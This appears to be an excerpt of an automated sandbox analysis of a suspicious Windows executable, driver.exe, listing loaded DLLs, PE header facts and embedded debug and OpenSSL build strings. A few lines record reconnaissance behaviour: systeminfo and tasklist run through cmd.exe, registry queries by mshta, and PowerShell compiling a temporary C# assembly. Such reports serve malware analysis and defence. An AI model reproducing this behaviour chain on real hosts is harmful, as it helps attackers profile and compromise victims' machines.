              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: driver.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: driver.exeStatic file information: File size 8761213 > 1048576
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: driver.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: driver.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: driver.exe, 00000002.00000002.2455137415.00007FF8B8F71000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: driver.exe, 00000002.00000002.2456731347.00007FF8BA4F1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: driver.exe, 00000002.00000002.2452820005.00007FF8B7E11000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: driver.exe, 00000002.00000002.2448164791.00007FF8A84C2000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdb source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: driver.exe, 00000002.00000002.2452545913.00007FF8B7DF1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: driver.exe, 00000002.00000002.2455696626.00007FF8B93C1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: driver.exe, 00000002.00000002.2453359812.00007FF8B7E51000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: driver.exe, 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
